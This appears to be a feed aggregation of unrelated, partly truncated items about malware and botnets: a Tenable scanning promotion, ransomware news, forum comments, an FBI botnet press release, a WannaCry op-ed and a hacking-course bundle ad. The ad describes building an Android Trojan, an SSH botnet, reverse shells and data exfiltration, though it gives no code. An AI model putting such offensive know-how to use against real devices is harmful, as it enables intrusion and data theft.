Staying Ahead of the Curve   
Tenable.io Malicious Code Prevention Report

As malware attacks continue to make headlines, many organizations struggle to stay ahead of the complex, evolving threat landscape. Attackers use both old and new ways to deliver malware through exploiting existing vulnerabilities, evading security solutions, and using social engineering to deliver malicious payloads. Millions of unique pieces of malware are discovered every year, and even with the best security controls in place, monitoring the thousands of endpoints within your network for malware can be nearly impossible.

Use Tenable.io to quickly address systems that are at risk

Once inside your network, malware can disable security controls, gain access to privileged accounts, replicate to other systems, or maintain persistence for long periods of time. If these risks are not addressed quickly, they can result in long term, devastating consequences for any organization. Using the Malicious Code Prevention Report from Tenable.io™ provides you with the visibility needed to quickly address systems that are at risk.

Malicious Code Prevention Report

Malware scanning

Tenable.io includes a customizable malware scan template where you can incorporate both good and bad known MD5 hashes, along with a hosts file whitelist. On Windows systems, hosts files contain commented lines of text that consist of two localhost address entries. Most systems will query local DNS servers to resolve domain names to IP addresses. Some organizations will add entries into hosts files for dedicated systems within their environment or to block unauthorized websites. Once a hosts file is modified, the local system will use the entries within the hosts file first and bypass records within your DNS server.

Malware also targets the hosts file to insert redirects to malicious sites or block security solutions from obtaining patches and security updates. For organizations utilizing the hosts file, the Malware Scan template provides you with the ability to add whitelist entries that would otherwise be flagged as abnormal by existing security solutions within your environment.

Malware Scan template

Enabling the File System Scanning option enables you to scan specific directories within your Windows environment such as the C:\Windows, C:\Program Files, and User Profile directories that are frequently used to install malware. You can also scan malware within directories such as C:\ProgramData that are hidden by default on Windows systems.

Scanning files

Organizations can have any number of mapped drives and devices connected to a system. Most anti-virus solutions only scan default directories such as the C:\ drive, and without additional rules in place, malware could easily bypass this security control via flash drive or external USB drive.

The Malware Scan template provides an additional layer of security to scan network drives and attached devices that may not be targeted by your anti-virus solution

The Malware Scan template provides an additional layer of security to scan network drives and attached devices that may not be targeted by your anti-virus solution. Using the Custom File Directories option, you can include a list of directories within your scan to target mapped drives and attached devices.

Yara rules can also be incorporated into your Tenable.io malware scan. Using a combination of regular expressions, text strings, and other values, Yara will examine systems for specific files that match values within the rules file.

Vulnerabilities

The Malicious Code Prevention report provides a comprehensive overview of systems infected with malicious backdoors, hosts communicating with botnets, and vulnerabilities that can be exploited by malware just to name a few.

Along with malware and malicious processes, this report also highlights systems with vulnerabilities that are exploitable by malware. Exploitable vulnerabilities can provide attackers with a backdoor into your network to enable privilege escalation or launch malicious code.

Hosts with vulnerabilities that are exploitable by malware

Tenable.io uses both active and passive methods to detect malicious content

Tenable.io uses both active and passive methods to detect malicious content, including web traffic analysis, md5sum matching, public malware databases, and links pointing to known malware operators. Web servers hosting malicious content are also included within this report. Malicious code can be injected into website due to a cross-site scripting (XSS) or SQL injection vulnerability.

Attackers often target websites to deliver malicious payloads to a larger audience through message boards or blog posts. Malicious code often remains hidden within iframes, JavaScript code, and other embedded tags that link to third-party websites. This data can help you target and remediate issues on web servers before critical assets or services are impacted.

Botnets often use the HTTP protocol as well as encryption to evade detection by modern security solutions. Information reported by Nessus® and Nessus Network Monitor highlights active inbound and outbound communications with command and control (C&C) servers.

Hosts interacting with known botnets

Keeping your anti-virus clients updated helps to ensure your systems remain protected from malware. This report provides valuable information on the status of your anti-virus and anti-malware solutions, ensuring that they are installed and up to date. The Malware Protection chapter provides a summary of hosts running up-to-date anti-virus clients per operating system.

Anti-virus status

Tenable.io will analyze hosts with outdated anti-virus clients and provide targeted information you can use to remediate issues with anti-virus clients. Data is collected from Nessus that checks the status of various anti-virus clients across Windows, Linux, and Unix-based platforms. Using this information can also help you determine if your anti-virus client has been disabled.

Outdated anti-virus details

No organization is immune from vulnerabilities and attacks

No organization is immune from vulnerabilities and attacks. Knowing how systems are compromised can help target response efforts and minimize future damage. Tenable.io provides you with critical insight needed to measure the effectiveness of your security program, and to gain insight into your current risk posture. Using the Malicious Code Prevention report by Tenable.io provides you with targeted information to prioritize remediation efforts, close malicious entry points, and stay one step ahead of attackers and other persistent threats.

Start with Tenable.io

To learn more about Tenable.io, visit the Tenable.io area of our website. You can also sign up for a free trial of Tenable.io Vulnerability Management.


          Detectado un malware dentro de un documento pdf adjunto en un email que encripta los datos del ordenador infectado y piden un rescate de 4.500 euros para restablecerlo   

Detectado un malware dentro de un documento pdf adjunto en un email que encripta los datos del ordenador infectado y piden un rescate de 4.500 euros para restablecerlo

Detectado un malware dentro de un documento pdf adjunto en un email que encripta los datos del ordenador infectado y piden un rescate de 4.500 euros para restablecerloIngenieros expertos en ciberseguridad de CheckPoint han detectado un nuevo tipo de ransomware al que le han apodado con el nombre de JAFF. JAFF se propaga a través de documentos PDF infectados y enviados por correo electrónico. Su función es la de encriptar los archivos del ordenador infectado y para solucionar el problema exigen al usuario un pago de unos 4.500 euros como rescate.

Este virus opera a través de la botnet Necurs, uno de los mayores y más efectivos distribuidores de ...

          By: JulesLt   
A little delayed, as for some reason I'd not correctly set up the RSS feed for the blog. Firstly, I'd like to say hats off to Mr.Fry for avoiding any mention of the Mac in his article, because it would have been both a distraction from the piece, and perhaps also detracted from the message ('ooh, look, it's one of those Mac users banging on about how secure the Mac is again'). Also because there have been Mac and Linux systems that have been found in botnets. How, you may ask? Well, while your basic operating system may be secure, there are a number of programs you can install that can make that irrelevant - for instance, if you're running a web server or database exposed to the Internet, you have a piece of software that's (a) sitting their listening to requests from the Internet (b) capable of running programs (not native Windows or OS X programs, but programs nonetheless. Some d/b and web servers can, for instance, send email). Now luckily, this is software that domestic users are currently unlikely to run. It's also unfair to blame the operating system in this case, but it does show that using OS X or Linux does not proof you against such things entirely.
          By: Richard Morton   
How do we know this blog isn't being written by a botnet, perhaps called Deep Thought? I would consider myself reasonably PC savvy, and yet I am sure it is only a matter of time before I consider myself sure about something on Vista, click the button and then moments later question my wisdom. Perhaps it is only a matter of time before Bill comes up with an Undo button for things like that. What is wrong with "painting a scenario", it's a metaphor isn't it?. The phrase "if a picture could paint a thousand words" would have you in apoplexy presumably. After all words can't be painted and a picture can't pick up a brush.
          socialbots, Propaganda-Bots, political bots   

So werden mit Bots Meinungen beeinflusst. Verschiedene Medienberichte, wissenschaftliche Untersuchungen und andere Ansätze:

http://politicalbots.org/

Election 2016 — Debate Three on Twitter. – Medium 

http://www.nzz.ch/digital/automatisierte-trolle-warum-social-bots-unsere-demokratie-gefaehrden-ld.116166

http://cacm.acm.org/magazines/2016/7/204021-the-rise-of-social-bots/fulltext

https://www.tagesschau.de/inland/social-bots-afd-101.html

http://www.merkur.de/politik/taeusch-roboter-im-us-wahlkampf-social-bots-auch-in-deutschland-denkbar-zr-6898866.html

http://www.faz.net/aktuell/feuilleton/medien/wahlbots-von-donald-trump-hillary-clinton-duellieren-sich-14480033.html

https://detektor.fm/politik/bots-als-meinungsmacher

http://www.zdnet.de/41557643/socialbots-stehlen-250-gbyte-an-nutzerdaten-bei-facebook/

http://www.iftf.org/future-now/article-detail/social-bot-competition-2012

Catalog of friendly, useful, artistic online bots, and resources that can help you make them | botwiki 🤖

https://politicaldatascience.blogspot.de/2016/09/invasion-der-meinungs-roboter.html

http://ondemand-mp3.dradio.de/file/dradio/2016/10/01/breitband_topic_social_bots_im_wahlkampf_drk_20161001_1310_ee42c55a.mp3

https://politicaldatascience.blogspot.com/2016/09/new-publication-are-socialbots-on_8.html

https://politicaldatascience.blogspot.com/2016/08/interview-im-deutschlandfunk-zu.html

https://politicaldatascience.blogspot.de/search?q=bots

https://twitter.com/elektrohase3

http://elektrohase.de

https://twitter.com/search?q=election%20bots

https://motherboard.vice.com/read/twitter-election-bots-hide-tons-of-reply-spam-behind-boring-themed-accounts

https://politicaldatascience.blogspot.de/2015/11/socialbotnets-vortrag-am-gesisorg.html

https://www.welt.de/print/wams/article153931496/Der-Shitstorm-vom-Fliessband.html

https://politicaldatascience.blogspot.de/2016/04/roboshitstorm-bericht-in-der-welt.html

https://de.wikipedia.org/wiki/Wikipedia:Bots

https://en.wikipedia.org/wiki/Wikipedia:Bots

Big Data Storytelling | Artificial Intelligence Software | Narrative Science | Narrative Science

https://en.wikipedia.org/wiki/Computational_journalism

https://de.wikipedia.org/wiki/Textgenerierung#Roboterjournalismus 
          #111 Cuando sabes que tienes la razón pero tus argumentos no convencen al otro: el efecto contraproducente   

#106 Meneame, si no eres consciente de los usos que le está dando el poder aquí, es una herramienta de manipulación y conformidad masiva.
Si no eres consciente de sus efectos "subliminales" en su uso, te pueden estar haciendo la cama sin que te enteres.

La televisión y los informativos de televisión tienen sus herramientas de manipulación.
La radio lo mismo.
Los periodicos mas de lo mismo.
Y meneame también.

Llevo hablando y leyendo del tema mucho tiempo y desarrollando el concepto de sistema de explotación de sesgos y vulnerabilidades. Sistema de generación de falso consenso.

Los peligros de meneame (ADVERTENCIA)
Poder y manipulación de atunes y ovejas en meneame
www.meneame.net/c/20380930

Detección de sesgos y perfilado psicologico de los atunes y ovejas
www.meneame.net/c/20488036

Buscar a candidatos idoneos para sectas. Botnet de fanáticos al alcance de un click.
www.meneame.net/c/20467459
www.meneame.net/c/18192621

Explotacion del efecto de conformidad de Asch
www.meneame.net/c/20417647

Suma y sigue, lo que quieras.
www.meneame.net/c/20476563

Tomar "meneame" sin leerte el prospecto de contraindicaciones de la secta
www.meneame.net/c/20459020

Explotando lo predeciblemente irracionales que somos (pero la mayoria cree que no)
www.meneame.net/c/19098208

Otro resumen similar del posible engaño aquí en meneame
www.meneame.net/c/20492279

Meneame es muy peligroso, y advertir a un compañero
www.meneame.net/c/20523846
www.meneame.net/c/20492279
www.meneame.net/c/20380930

Para cuando el firewall de explotación de sesgos y vulnerabilidades
www.meneame.net/c/18229401
www.meneame.net/c/20486359

» autor: capitan__nemo


          #54 Cuando sabes que tienes la razón pero tus argumentos no convencen al otro: el efecto contraproducente   

Supongo que este efecto lo tendrán en cuenta en la guia para contestar a los antivacunas.
www.meneame.net/story/guia-elaborada-oms-sobre-como-responder-antivacu
www.meneame.net/story/paises-mundo-donde-triunfan-antivacunas

Despues está el caracter de confianza de una comunidad. Meneame no es un entorno de confianza en absoluto. Un entorno lleno de psicopatas, trolls, agentes contrainteligentes, clones, agentes a sueldo o fanaticos que defienden una marca, un partido, un pais, un producto, una ideologia, una empresa, una religión, ...
Gente, que siendo trabajadores a sueldo y estando en su trabajo, muy preparada y profesional en su especialidad de manipular a la gente en cualquier dirección, explotando sus sesgos y vulnerabilidades a tope.

En este entorno es mas probable que acabes en una secta o siendo explotado por otros. Explotando tus sesgos y vulnerabilidades aunque estas tengan buenas intenciones. Matarán cualquier buena intencion que tengas.

El engaño de meneame. Botnet de fanaticos al alcance de un click
www.meneame.net/c/20492279
La mentira de meneame. Con todas sus vulnerabilidades y huecos, mas vulnerable al poder que incluso "la razon"
www.meneame.net/c/20380930

Despues cuando se utiliza constantemente la tecnica que describe #3 , eso socava la comunidad, es como contaminar psicologicamente una comunidad. Se dará ese efecto parecido al de la "teoria de las ventanas rotas"
es.wikipedia.org/wiki/Teoría_de_las_ventanas_rotas
Mata la comunidad y las intenciones de ayudar de la gente.

Pasa tanbien que cuando te llaman tonto, o ignorante o estupido, la gente no saltaria y le daria igual si esto no conectase con algo que tienen. Si se sintiesen seguros de si mismos no les impactarian afirmaciones como estas. Lo que pasa que muchas veces esto conecta con un sentimiento de inferioridad, o con una baja o media autoestima, o con cualquier otro trauma.

Despues está tambien la explotación de las tendencias toc que hace que no podamos quedarnos tranquilos al ver algo que está "mal", o que es incorrecto, o que no es simetrico, segun nuestras creencias claro. Por ejemplo si vemos un cuadro torcido y no podemos evitar ponerlo derecho, esto le pasaba al detective en la serie "Monk".
Despues la tendencia toc no tendrá siempre la misma intensidad, si hay momentos en que tenemos algun tipo de nerviosismo o estamos con algun otro tipo de problema, o no estamos tranquilos con algo en nuestra vida personal, no estamos satisfechos con nuestra vida, no nos sentimos felices por algo, pues la tendencia toc se puede acrecentar, y entonces seremos mas vulnerable a la tecnica de contaminación intencionada que comenta #3

Meneame es un entorno en el que se engaña y se explota masivamente el engaño y efecto de conformidad del experimento de Asch. Influencia de una falsa mayoria (creada por bots y clones votando a un comentario, o a un envio) y la conformidad. Con todas las vulnerabilidades que tiene meneame, esto lo hace muy vulnerable y peligroso a todo tipo de manipulaciones intencionadas.
www.youtube.com/watch?v=wt9i7ZiMed8
es.wikipedia.org/wiki/Experimento_de_Asch

Aqui se decia
"Es mas facil engañar a la gente que convencerles de que han sido engañados"
¿así que como no les puedes enseñar, ni convencer decirles engañarles de nuevo hacia otro sentido?
Ya decia que esto es la excusa del que no quiere enseñar, explicar y quiere seguir engañando. Porque enseñar y formar, requiere un esfuerzo mayor que engañar, ahi otro sesgo.
www.meneame.net/c/20507275

Despues el problema está tambien en los que no dudan, no se permiten dudar, no están abiertos a nuevas o diferentes explicaciones. Eso no sé si al final es malo, o es un efecto ante un entorno lleno de trolls, timadores y manipuladores. Es como cuando te viene un comercial del puerta a puerta (o dos) y tu ya sabes y eres completamente consciente de que eres completamente vulnerable a sus tecnicas, entonces te cierras en banda, ni siquiera les abres. ¿puedes luchar contra profesionales del engaño que son los vendedores?
#6 #0 #11

» autor: capitan__nemo


          Bots, Botnets and Zombies   

You have probably heard terms such as “bots,” “zombies,” and “botnets” in recent news stories about data breaches and other cyber security risks. But what exactly are they, how do they work, and what damage can they cause?


           Are You Cyber-Safe? New Podcast on Tech Topics and Trends Including Facebook’s Ad Technology and Online Privacy Issues, the Botnet War and More   

(PRWeb December 11, 2007)

Read the full story at http://www.prweb.com/releases/CourseCasts/Facebook/prweb575928.htm


          Besuch vom freundlichen Botnet aus China   
Am Donnerstag musste ich schmerzhaft lernen, das es keine gute Idee ist ein Wiki mit offener Registrierung und freiem editieren auf dem Server liegen zu haben. Donnerstag halb Sechs in Deutschland und der Server ist bei 300%-400% Auslastung. Nach etwas … Weiterlesen
          What happens if your WordPress is hacked – or: How botnets are created with hijacked Worpess, fake Flash downloads and node.js   
  I just noticed the website of an old employer has been hacked and some JavaScript is injected into their corporate website that runs on WordPress. Ouch. Of course I notified them about it and they’re just trying to figure out what happened and how to fix it. This taken care of, I of course […]
          Sieci Zombie   
S ieci botnet są coraz bardziej rozpowszechnione. Z danych statystycznych wynika, że co 4 komputer domowy w sieci to Zombie. W jaki sposób się one rozprzestrzeniają, co potrafią i dlaczego nie można sobie z nimi poradzić – na te pytania Czytelnik uzyska odpowiedź po przeczytaniu tego artykułu. Artykuł ten został opublikowany w numerze 7/2007 (27) […]
          SpyEye, ZeuS Users Target Tracker Sites   
Crooks who create botnets with crimeware kits SpyEye and ZeuS are creatively venting their frustration over a pair of Web services that help ISPs and companies block infected machines from communicating with control networks run by the botmasters.
          ZeuS Busts Bring Botnet Beatdown?   
Authorities in the United States, United Kingdom and Ukraine launched a series of law enforcement sweeps beginning late last month against some of the world's most notorious gangs running botnets powered by ZeuS, a powerful password-stealing Trojan horse program. ZeuS botnet activity worldwide took a major hit almost immediately thereafter, but it appears to be already on the rebound, according to one prominent ZeuS-watching site.
          Dozens of ZeuS Botnets Knocked Offline   
Security experts are tracking a massive drop in the global number of control servers for various ZeuS botnets that are online, suggesting that a coordinated takedown effort may have been executed by law enforcement and/or volunteers from the security research community acting in tandem.
          LinkedIn sues breaker Data Users   

Professional social network LinkedIn has recently filed a lawsuit against the party suspected of breaking into user data.This legal step is how LinkedIn to reveal the identity of the breaker data. According to information cited from TechCrunch, Tuesday (08/16/2016), it is also an effort to maintain the trust LinkedIn users.

The company was recently acquired by Microsoft for US $ 26.2 billion (Rp 340 trillion) are demanding that the burglars data by regulatory Computer Fraud and Abuse Act (CFAA). LinkedIn claims, these hackers collect user profiles."During the period December 2015 to date, a number of unidentified people using the software or bot and have been extracted at the same time doubling the LinkedIn user data," reads the lawsuit.

In this case, LinkedIn accused the hackers have developed a botnet in the massive amount and avoid the limitations of the use LinkedIn to prevent third parties from collecting user profile.The Company has been using a tool called the Org Block to block the IP addresses of suspected hazardous as well as Member and Guest Scoring uses to track the page request.

Even so, LinkedIn remains open access Google search. "LinkedIn incorporated a number of popular search engines and has a reputation as well as allow them to inquire and identify the LinkedIn pages without passing through a security restriction," the company said.LinkedIn representative declined to comment on how the company uses to distinguish crackdown by popular search pages used by hackers.
 

Even so, the company said, combat boots and allow some of the leading search engines is an important thing to do to protect user data. Currently, the case is heard in the middle of the US District Court in San Jose.
          Guión/Script: Actualizar #ListaNegra del cortafuego #Shorewall   
Unas de las bondades que nos ofrece el sistema Shorewall es la aplicación de Listas Negras, el cual nos permite tener un mejor control de los accesos que tienen nuestros equipos clientes o aun mejor estar protegidos de sitios dedicados a la propagación de SPAM, botnets, etc. Para esto requerimos estar al día y saber … Sigue leyendo
          Security: Defending Against Malware and Botnet Attacks   
Malware and botnet-led attacks are one of the biggest threats on the Internet today. Learn how they are formed, how they attack, and how to defend against them using a defense-in-depth approach.
          FBI, DHS Release Technical Details on North Korea’s DDoS Botnet Infrastructure   

U.S. Department of Homeland Security (DHS) and the FBI today released a technical alert based joint-effort analysis of methods behind North Korea’s cyberattacks. From today's release: "This alert provides technical details on the tools and infrastructure used by cyber actors of the North Korean government to target the media, aerospace, financial, and critical infrastructure sectors in the United States and globally. ... DHS and FBI identified Internet Protocol (IP) addresses associated with a malware variant, known as DeltaCharlie, used to manage North Korea’s distributed denial-of-service (DDoS) botnet infrastructure. This alert contains indicators of compromise (IOCs), malware descriptions, network signatures, and host-based rules to help network defenders detect activity conducted by the North Korean government. The U.S. Government refers to the malicious cyber activity by the North Korean government as HIDDEN COBRA."


          The Criminals Behind WannaCry   

359,000 computers infected, dozens of nations affected world-wide! A worm exploiting a Windows OS vulnerability that looks to the network for more computers to infect! This is the most pernicious, evil, dangerous attack, ever.

"The Big One” Wired pronounced.

"An unprecedented attack”, said the head of Europol.

Queue the gnashing of teeth and hand-wringing!

Wait, what? WannaCry isn't unprecedented! Why would any professional in the field think so? I'm talking about Code Red, and it happened in July, 2001.

Since then dozens, perhaps hundreds of Best Common Practice documents (several of which I've personally worked on) have been tireless written, published, and evangelized, apparently to no good effect. Hundreds of thousands, perhaps millions of viruses and worms have come and gone.

Our words 'update your systems, software, and anti-virus software' and 'back up your computer', ignored. The object lesson taught by Code Red, from almost sixteen years ago, forgotten.

Criminal charges should be considered: Anyone who administers a system that touches critical infrastructure, and whose computers under their care were made to Cry, if people suffered, or died, as is very much the possibility for the NHS patients in the UK, should be charged with negligence. Whatever ransom was paid should be taken from any termination funds they receive, and six weeks pay deducted, since they clearly were not doing their job for at least that long.

Harsh? Not really. The facts speak for themselves. A patch was available at least six weeks prior (and yesterday was even made available by Microsoft for 'unsupported' platforms such as Windows XP), as was the case with Code Red.

One representative from a medical association said guilelessly, in one of the many articles I've read since Friday 'we are very slow to update our computers'. This from someone with a medical degree. Yeah, thanks for the confirmation, pal.

The worm has been stopped from spreading. For now. iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com was registered by a security researcher, and sinkholed.

Sorry, forget it. I went for a coffee while writing this, and predictably WannaCry V2 has since been spotted in the wild, without the kill-switch domain left dangling.

What have we learned from all of this, all of this for a lousy $26,000?

If someone gets arrested and charged, and by someone, I mean systems administrators, 'CSOs' and anyone else in line to protect systems who abjectly failed this time, a lot. WannaCry infections to critical infrastructure are an inexcusable professional lapse. Or, we could just do all of this again, next time, and people may die.

Afterthought: My organization, CAUCE.org recently turned 20 years old. When it started, we didn't believe things could get this bad, but it wasn't too soon after that it became apparent. I issued dire warnings about botnets in 2001 to the DHS, I made public pronouncements to these ends in 2005 (greeted by rolled eyes from an RCMP staff sergeant). I may have been a little too prescient for my own good at the time, but can anyone really say, in this day and age, that lives are at stake, and we are counting on those responsible for data safety to at least do the bare minimum? I await your comments, below.

Written by Neil Schwartzman, Executive Director, The Coalition Against unsolicited Commercial Email - CAUCE


          BrandPost: Poorly Secured IoT Devices Prove a Potent Weapon for DDoS Attackers   

Last year, 2016, was the year that distributed denial of service (DDoS) attacks really lived up to the “distributed” part of their name. Why? Because a scenario long predicted, and feared, finally materialized in a big way. Attackers started to exploit the massive – and poorly secured – Internet of Things (IoT).

In late October, DNS provider Dyn suffered the largest DDoS attack yet seen. Its servers experienced simultaneous attacks that, combined, deluged them with over 1.2 terabyte-per-second of data. The source of the attack – a botnet that first infected and then directed more than 150,000 simple IoT devices, including Internet-connected cameras and DVRs.

To read this article in full or to leave a comment, please click here


          ZombieCoin – Using Bitcoin’s Network To Create Next Generation Botnets   

A botnet represents a network of a large number of compromised machines, which are distinctively referred to as bots or zombies, and are remotely controlled by the “botmaster”. Botnets were originally coded to act as means for vandalism and to “show off” hacking skills, yet they have presently evolved into sophisticated tools that are continuously […]

The post ZombieCoin – Using Bitcoin’s Network To Create Next Generation Botnets appeared first on The Bitcoin News - Decentralised Bitcoin and Crypto News.


          Over 1 Million Potential Victims of Botnet Cyber Crime   
The Department of Justice and FBI announced the results of an ongoing cyber crime initiative to disrupt and dismantle “botherders” and elevate the public’s cyber security awareness of botnets. OPERATION BOT ROAST is a national initiative and ongoing investigations have identified over 1 million victim computer IP addresses. The FBI is working with our industry partners, including the CERT Coordination Center at Carnegie Mellon University, to notify the victim owners of the computers. Through this process the FBI may uncover additional incidents in which botnets have been used to facilitate other criminal activity.

A botnet is a collection of compromised computers under the remote command and control of a criminal “botherder.” Most owners of the compromised computers are unknowing and unwitting victims. They have unintentionally allowed unauthorized access and use of their computers as a vehicle to facilitate other crimes, such as identity theft, denial of service attacks, phishing, click fraud, and the mass distribution of spam and spyware. Because of their widely distributed capabilities, botnets are a growing threat to national security, the national information infrastructure, and the economy.

“The majority of victims are not even aware that their computer has been compromised or their personal information exploited,” said FBI Assistant Director for the Cyber Division James Finch. “An attacker gains control by infecting the computer with a virus or other malicious code and the computer continues to operate normally. Citizens can protect themselves from botnets and the associated schemes by practicing strong computer security habits to reduce the risk that your computer will be compromised.”

The FBI also wants to thank our industry partners, such as the Microsoft Corporation and the Botnet Task Force, in referring criminal botnet activity to law enforcement.

Cyber security tips include updating anti‑virus software, installing a firewall, using strong passwords, practicing good email and web security practices. Although this will not necessarily identify or remove a botnet currently on the system, this can help to prevent future botnet attacks. More information on botnets and tips for cyber crime prevention can be found online at www.fbi.gov.

The FBI will not contact you online and request your personal information so be wary of fraud schemes that request this type of information, especially via unsolicited emails. To report fraudulent activity or financial scams, contact the nearest FBI office or police department, and file a complaint online with the Internet Crime Complaint Center, www.ic3.gov.

To date, the following subjects have been charged or arrested in this operation with computer fraud and abuse in violation of Title 18 USC 1030, including:

* James C. Brewer of Arlington, Texas, is alleged to have operated a botnet that infected Chicago area hospitals. This botnet infected tens of thousands of computers worldwide. (FBI Chicago);

* Jason Michael Downey of Covington, Kentucky, is charged with an Information with using botnets to send a high volume of traffic to intended recipients to cause damage by impairing the availability of such systems. (FBI Detroit); and

* Robert Alan Soloway of Seattle, Washington, is alleged to have used a large botnet network and spammed tens of millions of unsolicited email messages to advertise his website from which he offered services and products. (FBI Seattle)

The FBI will continue to aggressively investigate individuals that conduct cyber criminal acts.
          Bank-Busting Jihadi Botnet Comes Back To Life. But Who Is Controlling It This Time?   
The powerful botnet Brobot spent almost a year attacking American financial institutions before disappearing as quickly as it appeared. For the last 12 months, it looked as if this dangerous cyber-threat had been defeated for good. Now Brobot is back, security experts have revealed, and it looks as if it [...]
          What do Mirai & IoT botnets mean to the public sector?   
5 First Steps to Defending against IoT Driven DDoS Attacks In honor of October’s National Cybersecurity Awareness Month, users of Twitter, Netflix, Reddit and the New York Times were treated to a special treat – and just in time for Halloween. Unfortunately it was more of a trick as users of these and other major […]
          BOTNET   
СХ -- 9.07.11 док-во
          Pay What You Want: White Hat Hacker 2017 Bundle for $1   
These 63 Hours of Training in the Most Up To Date Security Tools & Practices Can Earn You a New Career
Expires October 26, 2021 23:59 PST
Buy now and get 99% off

The Complete Ethical Hacking Course for 2016-2017


KEY FEATURES

The world of ethical hacking and network security is constantly changing, which is what makes this course, specifically built with the most up to date information, so valuable. Whether you're completely new to ethical hacking, or just want to hone your skills with the newest technologies, this course will get you right up to speed with this exciting and lucrative career path.

  • Access 52 lectures & 9.5 hours of content 24/7
  • Get an introduction to ethical hacking
  • Learn Linux installation, terminal basics, & Wireshark setup
  • Understand how to stay anonymous online, how to use proxy servers, & how to access the dark web using TOR
  • Discover Aircrack-ng, HashCat, & WiFi hacking
  • Defend your own networks from attacks
  • Clone websites

PRODUCT SPECS

Details & Requirements

  • Length of time users can access this course: lifetime
  • Access options: web streaming, mobile streaming
  • Certification of completion not included
  • Redemption deadline: redeem your code within 30 days of purchase
  • Experience level required: all levels

Compatibility

  • Internet required

THE EXPERT

Ermin Kreponic is a strongly motivated young IT expert, Linux enthusiast with a passion for troubleshooting network related problems. He has an exceptional eye for details and a sense of urgency when it comes down to problem solving.

Python For Android Hacking Crash Course: Trojan Perspective


KEY FEATURES

Mobile security is of utmost importance, and developers will pay good money for pentesters who can identify security breaches in apps. In this course, you'll learn how to use Python to build a Trojan for ethical hacking purposes. You'll be able to discover flaws in Android security, and clean them up in one efficient swoop!

  • Access 26 lectures & 3.5 hours of content 24/7
  • Code a simple Android GUI interface w/ Python
  • Build a simple cross platform SSH botnet in Python
  • Create an SSH Android Trojan
  • Transfer & exfiltrate data out of a target device
  • Run Python SSH reverse shell on Windows, Linux, Android

PRODUCT SPECS

Details & Requirements

  • Length of time users can access this course: lifetime
  • Access options: web streaming, mobile streaming
  • Certification of completion not included
  • Redemption deadline: redeem your code within 30 days of purchase
  • Experience level required: all levels

Compatibility

  • Internet required
  • 4 GB RAM PC with Kali Linux Vbox
  • Android 4.2

THE EXPERT

Hussam Khrais is a senior security engineer with over 5 years in penetration testing, Python scripting and network security where he spends countless hours in forging custom hacking tools in Python.

Hussam currently holds the following certificates in information security:
  • GIAC Penetration Testing - GPEN
  • Certified Ethical Hacker - CEH
  • Cisco Certified Network Professional - Security (CCNP Security)

Learn Ethical Hacking From Scratch


KEY FEATURES

Interested in hacking for the good guys? This comprehensive course will take you from zero to hero in the field of ethical hacking, the career path where you get paid to expose system and network security threats. You'll explore four main sections: network penetration testing, gaining access, post exploitation, and web app penetration testing to get a complete, well-rounded education in how to responsibly and effectively improve security.

  • Access 125 lectures & 11.5 hours of content 24/7
  • Learn basic network pentesting
  • Gather information about networks & computers, & learn how to gain access & attack targets
  • Understand how to gain full access to computer systems w/o user interaction
  • Create server side & client side attacks
  • Discover how to interact w/ the systems you've compromised
  • Learn how to detect, prevent, & secure your system & yourself from every attack you learn

PRODUCT SPECS

Details & Requirements

  • Length of time users can access this course: lifetime
  • Access options: web streaming, mobile streaming
  • Certification of completion not included
  • Redemption deadline: redeem your code within 30 days of purchase
  • Experience level required: all levels

Compatibility

  • Internet required

THE EXPERT

Zaid Al-Quraishi is an ethical hacker, pentester, and programmer. He has extensive experience in ethical hacking and penetration testing, more specifically with regard to network security. Zaid started making video tutorials in 2009 for the ethical hacking website iSecuri1ty, and has also served as an editor, manager, and penetration tester for the company. He teaches mostly by example, specifically by first explaining the theory of each technique and then how it translates to a real-life situation.

Networks From Scratch to Advanced Implementation


KEY FEATURES

Just about all professional organizations and homes have some kind of network connection these days. Obviously, this means there is a huge market for network administrators. In this comprehensive course, you'll dive into networks, learning all you need to implement and maintain active networks in both corporate and personal environments. Soon enough, you'll have the know-how to make (or save!) some dough by managing networks.

  • Access 65 lectures & 12 hours of content 24/7
  • Discuss different types of networks & IP protocols
  • Build a server client network from scratch
  • Configure DHCP, DNS, & file servers
  • Understand routing & switching networks
  • Explore common network attacks & network security concepts

PRODUCT SPECS

Details & Requirements

  • Length of time users can access this course: lifetime
  • Access options: web streaming, mobile streaming
  • Certification of completion not included
  • Redemption deadline: redeem your code within 30 days of purchase
  • Experience level required: all levels

Compatibility

  • Internet required

THE EXPERT

Mohamed Atef is an ICT Consultant, Senior Penetration tester and certified instructor with more than 20 years of experience in professional and academic courses and 2 books published.

  • Certified Information System Security Professional (CISSP) ID #517943
  • Microsoft Certified Trainer (MCT) ID #3022752
  • EC Council Certified Instructor (CEI) ID #ECC51750391761
  • CEH: Certified Ethical Hacking ID #ECC64515022319
  • Certified Cisco System Instructor (CCSI)
  • Microsoft Certified System Engineer (MCSE)
  • Microsoft Certified IT Professional (Windows Server Administration 2008)
  • CompTIA Certified (Network +) ID #
  • CompTIA Certified (Server +)
  • CompTIA Certified (Linux +)
  • CompTIA Certified (Security +)
  • Cisco Certified Network Associate (CCNA)ID #CSCO11273248
  • Cisco Certified Network Professional (CCNP)
  • Project Management Professional (PMP) )ID #1772374

Certified Information Systems Security Professional


KEY FEATURES

The CISSP is an internationally recognized certification that demonstrates an IT professional's technical and managerial competence to protect organizations from increasingly sophisticated attacks. It's an ideal certification for anyone who wants to work in IT as it satisfies all government and professional security certification mandates and leaps out on a resume. In this course, you'll receive in-depth instruction in all things CISSP, so you can be fully prepared when you decide it's time to take the exam.

  • Access 68 lectures & 9.5 hours of content 24/7
  • Discuss penetration testing & information systems access control
  • Explore common security architecture frameworks
  • Understand different network types & topologies
  • Learn about cryptography, physical security, & operations security
  • Discuss the legal regulations & liability behind systems security

PRODUCT SPECS

Details & Requirements

  • Length of time users can access this course: lifetime
  • Access options: web streaming, mobile streaming
  • Certification of completion not included
  • Redemption deadline: redeem your code within 30 days of purchase
  • Experience level required: intermediate

Compatibility

  • Internet required

THE EXPERT

Mohamed Atef is an ICT Consultant, Senior Penetration tester and certified instructor with more than 20 years of experience in professional and academic courses and 2 books published.

  • Certified Information System Security Professional (CISSP) ID #517943
  • Microsoft Certified Trainer (MCT) ID #3022752
  • EC Council Certified Instructor (CEI) ID #ECC51750391761
  • CEH: Certified Ethical Hacking ID #ECC64515022319
  • Certified Cisco System Instructor (CCSI)
  • Microsoft Certified System Engineer (MCSE)
  • Microsoft Certified IT Professional (Windows Server Administration 2008)
